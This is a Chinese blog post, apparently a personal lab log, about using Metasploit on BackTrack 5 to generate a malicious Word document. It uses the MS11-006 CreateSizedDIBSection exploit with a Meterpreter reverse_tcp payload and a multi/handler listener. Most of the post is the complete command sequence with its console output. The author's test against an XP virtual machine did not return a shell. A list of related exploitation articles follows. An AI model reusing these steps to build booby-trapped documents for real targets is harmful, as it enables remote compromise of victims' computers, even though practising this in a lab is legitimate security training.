metasploit文件格式漏洞渗透攻击(成功生成doc)
2013-05-13 23:54
525 查看
因为BT5R3失败了,所以现在换成了BT5R1。
生成了msf.doc,把这个文件复制到XP虚拟机里。
然后,在BT5里输入命令:
我打开msf.doc,但是BT5没有成功打开shell。可能不是英文的缘故吧。明天换个英文的XP试试。
msf > use windows/fileformat/ms11_006_createsizeddibsection msf exploit(ms11_006_createsizeddibsection) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(ms11_006_createsizeddibsection) > set LHOST 192.168.1.11 LHOST => 192.168.1.11 msf exploit(ms11_006_createsizeddibsection) > set LPORT 443 LPORT => 443 msf exploit(ms11_006_createsizeddibsection) > set OUTPUTPATH /opt/framework/msf3/data/exploits/ OUTPUTPATH => /opt/framework/msf3/data/exploits/ msf exploit(ms11_006_createsizeddibsection) > show options Module options (exploit/windows/fileformat/ms11_006_createsizeddibsection): Name Current Setting Required Description ---- --------------- -------- ----------- FILENAME msf.doc yes The file name. OUTPUTPATH /opt/framework/msf3/data/exploits/ yes The output path to use. Payload options (windows/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC seh yes Exit technique: seh, thread, process, none LHOST 192.168.1.11 yes The listen address LPORT 443 yes The listen port Exploit target: Id Name -- ---- 0 Automatic msf exploit(ms11_006_createsizeddibsection) > exploit [*] Creating 'msf.doc' file ... [*] Generated output file /opt/framework/msf3/data/exploits/msf.doc msf exploit(ms11_006_createsizeddibsection) >
生成了msf.doc,把这个文件复制到XP虚拟机里。
然后,在BT5里输入命令:
msf exploit(ms11_006_createsizeddibsection) > use multi/handler msf exploit(handler) > set payload windows/meterpreter/reverse_tcp payload => windows/meterpreter/reverse_tcp msf exploit(handler) > set LHOST 192.168.1.11 LHOST => 192.168.1.11 msf exploit(handler) > set LPORT 443 LPORT => 443 msf exploit(handler) > exploit -j [*] Exploit running as background job. [*] Started reverse handler on 192.168.1.11:443 [*] Starting the payload handler... msf exploit(handler) >
我打开msf.doc,但是BT5没有成功打开shell。可能不是英文的缘故吧。明天换个英文的XP试试。
相关文章推荐
- metasploit文件格式漏洞渗透攻击(成功获得shell)
- metasploit文件格式漏洞渗透攻击(失败)
- 《Metasploit 魔鬼训练营》05 网络服务渗透攻击
- Excel打开csv格式文件并生成图形功能实现方案
- VC6之MAP文件生成及格式
- imread无法确定文件格式,cmd生成描述文件,读取指定文件夹图片
- 视频经验---1对多媒体的支持能力验证 2格式转换3视频截图4屏幕录制5音视频采集6从文件生成流媒体7从设备生成实时流
- 文件上传漏洞是什么?要怎样防御文件上传的漏洞攻击?
- ASP生成静态文件编码为UTF-8格式的HTML文件
- 通过生成PSR文件,实现动态报表格式
- 利用jsp生成excel格式文件
- 通过生成PSR文件,实现动态报表格式
- 在恢复oracle文件时,在Format32 格式硬盘符下,无法恢复生成大于4G文件
- Backtrack5 网络漏洞攻击工具 Metasploit
- 利用jsp生成excel格式文件
- PB编译生成的BIN文件的格式
- lecene.net实现pdf,doc,xls,ppt,htm,html等格式文件的检索
- vc6.0编译生成各种格式文件的作用
- python处理文本文件并生成指定格式的文件
- Metasploit下MS12_044_midi漏洞渗透